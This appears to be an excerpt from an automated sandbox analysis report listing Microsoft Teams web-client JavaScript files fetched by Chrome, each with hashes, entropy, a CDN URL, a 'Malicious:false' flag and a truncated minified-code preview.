                                                                                                                                                                                                                                                                            SHA-512:34AEC1329E8B73EE01EB11904A365361B8178658849B97DEDE85D6B83E1AA5B69ECDEA52FAB77EB810DD3795BF0F08BC4CB1577132A84BA3A4FC05081A062155
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/690936-1a9055ee191c5edd.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[690936],{297689:(e,t,s)=>{var r;s.d(t,{MP:()=>r,C9:()=>i}),function(e){e.default="default",e.skypeConCore="conCore",e.mediaAgent="mediaAgent",e.CDL="CDL",e.copilot="copilot"}(r||(r={}));Object.entries(r).map((([e,t])=>({label:e,value:t})));const i=new Set(["AppInfo.ClientType","Window.Type","Panel.Context","Session.TelemetryWorkerType","AppInfo.ExpIds","UserInfo.ETag","UserInfo.HostETag","Window.Type","AppInfo.Version","AppInfo.ExperienceName"])},336223:(e,t,s)=>{s.d(t,{M:()=>C});var r=s(18863),i=s(156054),n=s(239857),a=s(368848);const o={maxStorageSizeInBytes:5e6,storageKeyPrefix:"Teams:telemetry-instrumentation-offline-storage",minPersistenceLevel:2,eventsLimitInMem:null,inMemoMaxTime:15e3,inStorageMaxTime:1008e4,maxRetry:1,maxBatchsize:63e3,maxSentBatchInterval:15e3};var h;!function(e){e[e.ONLINE=1]="ONLINE",e[e.OFFLINE=2]="OFFLINE"}(h||(h={}));const l=["admin","Admin","AD
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (31689)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):31797
                                                                                                                                                                                                                                                                            Entropy (8bit):5.438772364546282
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:w2UGF9QQNt11j3lAVQAs5IpONtKzrs5vS1AUbK5wlA/2Fk2ClxNHXs5FWd3NNM1:g0jeVlsfurs4w5mO01
                                                                                                                                                                                                                                                                            MD5:6CE8DEFA016A333EB95E27D5D2E63316
                                                                                                                                                                                                                                                                            SHA1:E7ADFB05C75DF1FD13FCC8A34BB86F6E47B4C8BD
                                                                                                                                                                                                                                                                            SHA-256:282D6A88554351A160F7D45592C135445BB21588E62FBCEC24EFAFF4E2ED52B1
                                                                                                                                                                                                                                                                            SHA-512:713F2BF05B0F6AA36638FE6A324041904137C651F630680620AC1C96E4ED90ACA15D0D4AA94BF6615E6A12C4BBC8AE3BBE0DA949501E3C1D7140416707B6EB0A
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/237080-52321579da5a9d19.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[237080],{502194:(e,t,n)=>{n.d(t,{p:()=>o});var i=n(362328);const o={kind:"Document",get definitions(){const e=(0,i.G)("mutation DataResolversBrowserCallingSetIsCallingScreenReadyMutation($teamsCallId:ID!) {setIsCallingScreenReady(teamsCallId:$teamsCallId) @client}");return delete this.definitions,this.definitions=e.definitions}}},14160:(e,t,n)=>{n.d(t,{G:()=>o});var i=n(362328);const o={kind:"Document",get definitions(){const e=(0,i.G)("query DataResolversBrowserCallingIsCallingScreenReadyQuery($teamsCallId:ID!) {isCallingScreenReady(teamsCallId:$teamsCallId) @client}");return delete this.definitions,this.definitions=e.definitions}}},818072:(e,t,n)=>{n.d(t,{A:()=>a});var i=n(757060),o=n(205007);const a=(e,t)=>{const n=!(0,o.RW)();return(0,i.I)(e,t?{...t,skip:n||t.skip}:{skip:n})}},159320:(e,t,n)=>{n.d(t,{q:()=>l});var i=n(513432),o=n(802756),a=n(881360),s=n(382125),r=n(818072
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (19349)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):19469
                                                                                                                                                                                                                                                                            Entropy (8bit):5.469457610850632
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:0CH6vY11+WWdH4K481Bzy65hmGPg5f6+4UBev0DNK04476x39mFYVdACUmt5/7qQ:0CavY1v0HdBW65hc6+Fev08044s9mFqf
                                                                                                                                                                                                                                                                            MD5:7F3F015837A71A5F44DB75E3AB4CE8C2
                                                                                                                                                                                                                                                                            SHA1:2D4D1432798CCEFC1F9A1A3AA80707A7ED2296B4
                                                                                                                                                                                                                                                                            SHA-256:E13A3426474D1993F36A0AE061DE6F4BD45CB68DCC68C903DEFE7C1DD8ED8482
                                                                                                                                                                                                                                                                            SHA-512:D2B53FB9BE0DE75D5294273F5F7DC5909B585972495AE7ADB7EAEBA4B1C6AA95BDE5BE8AB05DC6C37DF25E71FC4B15285AD3A19F89274FADC853908298B9DB8A
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/839569-5ad0493aad697642.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[839569],{19493:(e,t,r)=>{var s;r.d(t,{Q:()=>s}),function(e){e[e.Missing=0]="Missing",e[e.Loading=1]="Loading",e[e.Loaded=2]="Loaded",e[e.Failed=3]="Failed"}(s||(s={}))},324011:(e,t,r)=>{r.d(t,{$n:()=>_,fj:()=>c,gI:()=>u,DU:()=>o,Co:()=>l,Xy:()=>m,lw:()=>h});const s=["aao","abh","abv","acm","acq","acw","acx","acy","adf","ads","ae","aeb","aec","afb","ajp","apc","apd","ar","arb","arc","arq","ars","ary","arz","auz","avl","ayh","ayl","ayn","ayp","bbz","bcc","bqi","ckb","dv","fa","glk","hbo","he","jpr","ku","men","mzn","nqo","pbt","pbu","peo","pes","pga","pnb","prd","prp","prs","ps","pst","sam","sd","shu","sqr","ssh","ug","ur","xaa","xmn","ydd","yhd","yi","yih","yud","pseudo_rtl"];var a=r(72393),n=r(802756);const i={af_ZA:1078,am_ET:1118,ar_AE:14337,ar_BH:15361,ar_DZ:5121,ar_EG:3073,ar_IQ:2049,ar_JO:11265,ar_KW:13313,ar_LB:12289,ar_LY:4097,ar_MA:6145,ar_OM:8193,ar_QA:16385,ar_SA:10
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (55961)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):56068
                                                                                                                                                                                                                                                                            Entropy (8bit):5.258949420304227
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:ko5r8r5Nxx50EOmgy5dY+WqZvkExz8YC4v7n6:kIr8r5NxP0EOmgy5dfWqZvkMz8YVv7n6
                                                                                                                                                                                                                                                                            MD5:826305738A9D8121EEE29B3EA61F3FFD
                                                                                                                                                                                                                                                                            SHA1:3242FC92155409FEA5D998E110DAA0FE0F21C774
                                                                                                                                                                                                                                                                            SHA-256:188AB9EBCAA1E04701757D76584D0A45B2CA650E11967C9873C592EA6CC70ED5
                                                                                                                                                                                                                                                                            SHA-512:2F57668410A3E659A74E6DEBADE66BC3F1D1FD2C70F45E6153D7B0F665882CB5F4436903F315A78A75A1D148317C3B61FBF76DFD62A18F387635041C3BE516B1
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[33834,425104],{33834:(e,t,n)=>{n.d(t,{DO:()=>fe});var r=n(615582),o=n(296920);function i(e,t,n){var i,s=e instanceof Error?e:new Error("Unexpected error value: "+(0,r.A)(e));return Array.isArray(s.path)?s:new o.e(s.message,null!==(i=s.nodes)&&void 0!==i?i:t,s.source,s.positions,n,s)}var s=n(189687),a=n(132786),u=n(691143),l=n(18542),c=n(710773);function f(e,t){if(!Boolean(e))throw new Error(null!=t?t:"Unexpected invariant triggered.")}var d=n(3929),p=n(756976);function h(e,t,n,r){if(!e)return;if(e.kind===s.b.VARIABLE){const n=e.name.value;if(null==r||void 0===r[n])return;const o=r[n];if(null===o&&(0,d.bd)(t))return;return o}if((0,d.bd)(t)){if(e.kind===s.b.NULL)return;return h(e,(0,d.oA)(t),n,r)}if(e.kind===s.b.NULL)return null;if((0,d.Fs)(t)){const o=(0,d.oA)(t);if(e.kind===s.b.LIST){const t=[];for(const i of e.values)if(v(i,r)){if((0,d.bd)(o))return;t.push(null)}else{const e
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (12648), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):12648
                                                                                                                                                                                                                                                                            Entropy (8bit):5.331618680016599
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:UBvT91sirzk6r/Ta1sirzogFXhFh76cQJ:UBvT3To6jqTkgFXhFh76cQJ
                                                                                                                                                                                                                                                                            MD5:B3688EB03DF81642144495322F067B41
                                                                                                                                                                                                                                                                            SHA1:B1A0AB57D487B8D2F6C6883204DDAD50D74121A9
                                                                                                                                                                                                                                                                            SHA-256:6FE9A5B6A3BB2C20937E96B04EDE350E39C6AEC365BE5DEA991C8AEFE235B9C8
                                                                                                                                                                                                                                                                            SHA-512:C0D86423670A2D99785609EE5A93C59A7384C16751840BC7D7E0A84A9F1CAB4116AB889CA7842456D308443A5650CC855B845C347D472FA07AE250BBAD6C9743
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";var sidecarDiagnostics,sidecarChatZeroState,sidecarMeetApp,sidecarTflOnboarding,sidecarUserContext,sidecarI18nContext,sidecarHtmlSanitizerContext,sidecarAriaLiveContext,sidecarFocusManagementContext;(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[150699],{564961:(e,t,r)=>{var i={".":()=>Promise.all([r.e(587200),r.e(918681),r.e(215111),r.e(750818),r.e(978582),r.e(756854),r.e(769268),r.e(70674),r.e(367927),r.e(268921),r.e(842549),r.e(459628),r.e(664062),r.e(994444),r.e(35871)]).then((()=>()=>r(431810)))},n=(e,t)=>(r.R=t,t=r.o(i,e)?i[e]():Promise.resolve().then((()=>{throw new Error('Module "'+e+'" does not exist in container.')})),r.R=void 0,t),a=(e,t,i)=>{if(i&&(r.tu=i),r.S){var n="default",a=r.S[n];if(a&&a!==e)throw new Error("Container initialization failed as it has already been initialized with a different share scope");return r.S[n]=e,r.I(n,t)}};r.d(t,{get:()=>n,init:()=>a})}},e=>{e.O(0,[921072],(()=>(564961,e(e.s=5649
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1658)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):1766
                                                                                                                                                                                                                                                                            Entropy (8bit):5.0676511543527605
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:48:wp3sp3jXpWHv3NR2mXWfNaFWE7g5u7tScC:2NR2MWfgpT7g7
                                                                                                                                                                                                                                                                            MD5:14EA476F646BC8B6183B0E8BFE538647
                                                                                                                                                                                                                                                                            SHA1:2ED93984FCBD8478CE6D77528222886BA6C3593C
                                                                                                                                                                                                                                                                            SHA-256:2F64BF50E56476DBC7378D793C89D3B7756D479213C77C11A2EEEAA0F5779A0F
                                                                                                                                                                                                                                                                            SHA-512:345B1076831BEE8A2BD853E54366AEBBD2D8F60E6895D7466E026226650DC2AE31E3157CDC210FB2210C6E5E2EFE0C512FA444B4C960A35C1DD84F0B876D206D
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[461500],{461500:(a,e,c)=>{c.d(e,{E:()=>r});var s=c(513432),l=c(395225),t=c.n(l),n=c(485529),h=c(829289),r=(0,n.Ke)({svg:function(a){var e=a.classes;return s.createElement("svg",{role:"presentation",focusable:"false",viewBox:"2 2 16 16",className:e.svg},s.createElement("path",{className:t()(h.Q.outline,e.outlinePart),d:"M11.5 4a1.5 1.5 0 00-3 0h-1a2.5 2.5 0 015 0H17a.5.5 0 010 1h-.554L15.15 16.23A2 2 0 0113.163 18H6.837a2 2 0 01-1.987-1.77L3.553 5H3a.5.5 0 01-.492-.41L2.5 4.5A.5.5 0 013 4h8.5zm3.938 1H4.561l1.282 11.115a1 1 0 00.994.885h6.326a1 1 0 00.993-.885L15.438 5zM8.5 7.5c.245 0 .45.155.492.359L9 7.938v6.125c0 .241-.224.437-.5.437-.245 0-.45-.155-.492-.359L8 14.062V7.939c0-.242.224-.438.5-.438zm3 0c.245 0 .45.155.492.359l.008.079v6.125c0 .241-.224.437-.5.437-.245 0-.45-.155-.492-.359L11 14.062V7.939c0-.242.224-.438.5-.438z"}),s.createElement("path",{className:t()(h.Q.fil
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):251568
                                                                                                                                                                                                                                                                            Entropy (8bit):5.245270487365831
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3072:iVWVXAVGzuTTWj1dtoy4HMT0dcaTehi5KnxDvwq7vri9kX71d6kqJGXjimk4D:Cz/Wj1Ay4LcaTehi5KxjLd1PiwnD
                                                                                                                                                                                                                                                                            MD5:3EE65944077B46B27938558FA1BF5AC5
                                                                                                                                                                                                                                                                            SHA1:C2212294D70683C4E7F924BB8DA0CB6BF51AD2C8
                                                                                                                                                                                                                                                                            SHA-256:690CD7C6E4347E02D31E6A96363AEE759F6BC0DD48EF35382FCDD3A197B2A5D6
                                                                                                                                                                                                                                                                            SHA-512:6B990B7AEA54F9D6361754D8A50BEB0EFE9B83D43DF8DBB841F191CA156680F2A215FDDFDCD2C510F855CC3E8D708FE9B8B372709CE2E9084EAF9E875BE0ED91
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/418261-c0ca625c703c4b8b.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[418261],{657953:(e,t,n)=>{"use strict";var o,r;n.d(t,{F:()=>o}),function(e){e[e.Client=0]="Client",e[e.Server=1]="Server"}(o||(o={})),function(e){e.None="None",e.RecentlyAccessed="RecentlyAccessed",e.Frequent="Frequent",e.Trending="Trending",e.Uploaded="Uploaded"}(r||(r={}))},418967:(e,t,n)=>{"use strict";n.d(t,{X:()=>r});var o=n(408723);class r extends o.b{constructor(){super(),this.addListener=super.addListener.bind(this),this.on=super.on.bind(this),this.once=super.once.bind(this),this.prependListener=super.prependListener.bind(this),this.prependOnceListener=super.prependOnceListener.bind(this),this.removeListener=super.removeListener.bind(this),this.off=super.off.bind(this)}}},402344:(e,t,n)=>{"use strict";var o;n.d(t,{K:()=>o}),function(e){e[e.Disconnected=0]="Disconnected",e[e.EstablishingConnection=3]="EstablishingConnection",e[e.CatchingUp=1]="CatchingUp",e[e.Connected=2]="Connecte
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):316178
                                                                                                                                                                                                                                                                            Entropy (8bit):5.268366494766045
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:6144:Db8wBO1kp38IFhC125W3Ql3yn5HSPF7Hn3Wio6:DbAah+25W3EGeXWin
                                                                                                                                                                                                                                                                            MD5:4413BB373CA8F32D729254F56B617F93
                                                                                                                                                                                                                                                                            SHA1:FA3404FE39D04813B4022652A5B23A22629876FA
                                                                                                                                                                                                                                                                            SHA-256:9E8084D6663E02AFA00EBCDB426632F12750A2BA4F500C169484E1EF73F01AE7
                                                                                                                                                                                                                                                                            SHA-512:BE7D0D228EC268E8418933E5D7C8620C90F9BB7105949E836CF112AF7910C92F792411C4134E4607364C9B03F119AE4EC7085DFB2202BBB11DF2EB3B74BA5FC8
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[865969],{407845:(e,t,r)=>{r.d(t,{vq:()=>c,Ji:()=>d,q8:()=>l});var n=r(514181),o=r(538906),i=r(145353),a=r(789389),s=r(543678);class c{static async createPublicClientApplication(e){const t=await(0,n.K)(e);return new c(e,t)}constructor(e,t){this.controller=t||new o.i(new i.A(e))}async initialize(e){return this.controller.initialize(e)}async acquireTokenPopup(e){return this.controller.acquireTokenPopup(e)}acquireTokenRedirect(e){return this.controller.acquireTokenRedirect(e)}acquireTokenSilent(e){return this.controller.acquireTokenSilent(e)}acquireTokenByCode(e){return this.controller.acquireTokenByCode(e)}addEventCallback(e){return this.controller.addEventCallback(e)}removeEventCallback(e){return this.controller.removeEventCallback(e)}addPerformanceCallback(e){return this.controller.addPerformanceCallback(e)}removePerformanceCallback(e){return this.controller.removePerformanceC
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (42589)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):42697
                                                                                                                                                                                                                                                                            Entropy (8bit):5.306103537895922
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:OLFeJjTEvUcMRMBotO1UnG53QDxl/LVSkOpNWxuChue15NMjMx/iGrapPRPoB1:AFeCdeTzLVSkOpNWxuChue15NSkq0aG1
                                                                                                                                                                                                                                                                            MD5:5B258984C7A1B2EBB8BEC03203900B30
                                                                                                                                                                                                                                                                            SHA1:1D1379B79314140133A0E92CFF59640F71CB4E77
                                                                                                                                                                                                                                                                            SHA-256:B99452833C8335DAB1D0556362AE38678020909B5AFCDC40E192FCB9E334C00E
                                                                                                                                                                                                                                                                            SHA-512:FF404A1B12D25E707ED9B468E67A34B92EAA6197B0EA5E840A7743FF0594870531D33875708A5540F8A4C4E5DF29F19457005A7D6E31066898707AB6B64E1DA2
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[415696],{337327:(e,t,i)=>{var n,o;i.d(t,{G:()=>n,T:()=>o}),function(e){e.Sync="Sync",e.Unsync="Unsync",e.Details="Details"}(n||(n={})),function(e){e.navigation="navigation",e.contactsSyncSettingsMutation="contacts_sync_settings_mutation",e.googleContactsSyncSettingsMutation="google_contacts_sync_settings_mutation",e.externalAccountHardDeleteMutation="external_account_hard_delete_mutation"}(o||(o={}))},415696:(e,t,i)=>{i.d(t,{FM:()=>ot,Tx:()=>nt,fV:()=>at,EO:()=>tt,do:()=>ht,km:()=>St,k5:()=>wt,m_:()=>lt,Bs:()=>dt,b7:()=>st,rK:()=>gt,GC:()=>Ct,OB:()=>pt,x4:()=>_t,si:()=>rt,Gd:()=>bt,U7:()=>kt,UJ:()=>it,jm:()=>ft,dS:()=>yt,vn:()=>mt,Dr:()=>vt});var n=i(337327),o=i(957032),a=i(626388),s=i(336086),c=i(727572),r=i(302086);const l=()=>{const e=(0,c.PO)().stringTranslate("people","privacy_settings_manage_blocked_users_empty_list_text");return(0,s.s)(e),(0,o.Y)(r.D,{"data-tid":"block
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65531), with no line terminators
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):103786
                                                                                                                                                                                                                                                                            Entropy (8bit):5.261490918744291
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:0zuTx2lhML9fXawZl4UEVErSgcAHP2dErROyG:7TCMFE6SgXOyG
                                                                                                                                                                                                                                                                            MD5:AF5B61E63EDF148383430A18381D2F9A
                                                                                                                                                                                                                                                                            SHA1:A6DD3EBC64F1D401A3E970EF8A13D2EEB5328987
                                                                                                                                                                                                                                                                            SHA-256:6CFDA19B61B4BB0AF261914AF54875287835A5EDD8D61E184FD8B229E7235907
                                                                                                                                                                                                                                                                            SHA-512:15B0DAE2836D51E707D7F62FE4AEAE5D2AF16D9A93316F1A7B3D0822ABCF4B27C1CC9B0A2C8B6355C3FFE05425638543DC253965216A56532C5746042D6EDB39
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/927767-5e852cded1999922.js?ts=1733248828627
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[927767,317822,425104],{787762:(e,t,n)=>{"use strict";n.d(t,{I3:()=>ue,Em:()=>se,n_:()=>de,WY:()=>le,Nj:()=>ae,Rs:()=>ce});var r=n(845155),o=n.n(r),i=n(757060),s=n(213991),u=n(451281),a=n(513432),l=n(364819);function c(){const[e,t]=(0,a.useReducer)((e=>e+1),0);return t}var d=n(860775),f=class{constructor(e){this.onComplete=e,this.status=[!0,void 0]}isIdle(){return this.status[0]&&void 0===this.querySubscription}dispose(){var e;null==(e=this.querySubscription)||e.unsubscribe(),this.querySubscription=void 0}reset(){this.dispose(),this.status=[!0,void 0]}handleResult(e){this.status=[!1,e],this.dispose(),this.onComplete()}subscribe(e){this.querySubscription=e.subscribe((({error:e})=>{this.handleResult(e)}),(e=>{this.handleResult(e)}))}};function p(e,t){const{watchQueryDocument:n}=e;o()(n,"useLazyLoadQuery(): Expected a `watchQueryDocument` to have been extracted. Did you forget to invoke the c
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (33642)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):33750
                                                                                                                                                                                                                                                                            Entropy (8bit):5.416241015305667
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:XdE4+HCBWnWmt9/YpXfOYhZZnSgmyJ7MqVfbHEgGVM/8eNyXa77itOpIaR7GR0I3:XwuZnSgm6g+TPn+a772OpIaR780C
                                                                                                                                                                                                                                                                            MD5:0CB7F362F3A5FCAFB4BFD1000831C40B
                                                                                                                                                                                                                                                                            SHA1:D2CEE4FED4A0BD9F7E7B8DA70AA6E4A667F94417
                                                                                                                                                                                                                                                                            SHA-256:6315D15FD3B316296BDD64F45115781665B5561ACD0427280267FE74AD318F4C
                                                                                                                                                                                                                                                                            SHA-512:069DDEDF7CEB723E335DAAC8A8E440C21B319CEC3C564BBD6DA3227A24FFE40F8E1624303E207A5D0FB6048969612A1DAB18A58BAD5D9559F8C1C63A3ED5E7FC
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/615291-950c34d009c5d4c3.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[615291,838790,268800,173388,951007],{182227:(e,t,n)=>{n.d(t,{K:()=>r});var r=function(){return{attributes:{root:{role:"img","aria-hidden":"true"}}}}},678865:(e,t,n)=>{n.d(t,{s:()=>o});var r=n(953543),o=function(e){var t=a(e);return{attributes:{trigger:{"aria-describedby":t||e["aria-describedby"]},tooltip:{role:"tooltip",id:t,"aria-hidden":!e.open}},keyActions:{trigger:Object.assign({},e.open&&{close:{keyCombinations:[{keyCode:r.rC.Escape}]}})}}},a=function(e){if(!e["aria-describedby"])return e.contentId}},799224:(e,t,n)=>{n.d(t,{_:()=>f});var r=n(513432),o=n(644525),a=n(854130);var l=n(164093),s=n(250452);var i=n(965804),c=n(526521);const u="fui-Image",d=(0,i.O)({base:{g2u3we:"fj3muxo",h3c5rm:["f1akhkt","f1lxtadh"],B9xav0g:"f1aperda",zhjwy3:["f1lxtadh","f1akhkt"],Beyfa6y:0,Bbmb7ep:0,Btl43ni:0,B7oj6ja:0,Dimara:"f1fabniw",B7ck84d:"f1ewtqcl",mc9l5x:"f14t3ns0"},bordered:{icvyot:"
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1553)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):1661
                                                                                                                                                                                                                                                                            Entropy (8bit):5.0225756013299625
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:48:wp3sp3MOpj9sc69uIIbBbdDAMR2ib/8MWAmKi0ts:Kg9scXDRMMQTKG
                                                                                                                                                                                                                                                                            MD5:36257721841A878FDC2BB0DEBF79AB4D
                                                                                                                                                                                                                                                                            SHA1:306BC380F6493BBCFA3DB3F22ED1F114DA25DE9A
                                                                                                                                                                                                                                                                            SHA-256:C646F166DA49CBE06D285A2A86B4E11B7E1DE5EDAD5A4A3626187B4B635E40E2
                                                                                                                                                                                                                                                                            SHA-512:6F2A5D922F8FCC25E20F8B52BE2F011346A7F1C452DC3C04F8120EA28545BB9A24DB99DA8DB7D25CF154DD6491188D500133358085917CA299BC422C723F96EF
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/796156-6a5ce39eeee2ab66.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[796156],{796156:(e,s,a)=>{a.d(s,{s:()=>n});var C=a(957032),t=a(395225),l=a.n(t),c=a(485529),i=a(829289);const n=(0,c.Ke)({svg:({classes:e})=>(0,C.Y)("svg",{role:"presentation",focusable:"false",viewBox:"0 0 18 18",className:l()(e.svg),children:[(0,C.Y)("path",{className:l()(i.Q.outline,e.outlinePart),d:"M18 4.8016C18 3.81605 17.0658 3.09831 16.1135 3.35225L3.11351 6.81891C2.45688 6.99402 2 7.58869 2 8.26827V10.7792C2 11.4249 2.41315 11.9981 3.02566 12.2023L5 12.8604V13.75C5 15.5449 6.45507 17 8.25 17C9.62112 17 10.7932 16.1513 11.2709 14.9507L16.0257 16.5356C16.997 16.8594 18 16.1364 18 15.1126V4.8016ZM10.32 14.6337C9.97657 15.437 9.17866 16 8.25 16C7.00736 16 6 14.9926 6 13.75V13.1937L10.32 14.6337ZM16.3712 4.31848C16.6886 4.23384 17 4.47309 17 4.8016V15.1126C17 15.4538 16.6657 15.6948 16.3419 15.5869L3.34189 11.2536C3.13771 11.1855 3 10.9944 3 10.7792V8.26827C3 8.04174 3.15
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):66303
                                                                                                                                                                                                                                                                            Entropy (8bit):5.329796834057744
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:YCqR3ciA/k/Pp5QAQE29MsMS5GTB/lK1Umi3NpFDWDKq+ApIOdzKqd:YSimQst0B/A1Umi3NpFDWDKq+ApIOdGY
                                                                                                                                                                                                                                                                            MD5:AFF12B8E4EAFD12437A222BB1BF39D7F
                                                                                                                                                                                                                                                                            SHA1:9102DF20D80DEBE548E4EF7FA05B7FD3433A8B91
                                                                                                                                                                                                                                                                            SHA-256:C485C1094B434E259D4D7D01FF84F08F0A52C1B4331B808B30858E291E128B37
                                                                                                                                                                                                                                                                            SHA-512:489F056F80D44517BF65967FA4713D5175E13C7BC999D8153F3C81ED1073A1454BCFF0356F774196C8B4B52A787843C00F88E1E88476F2189C0ADD5F1C4DED1F
                                                                                                                                                                                                                                                                            Malicious:false
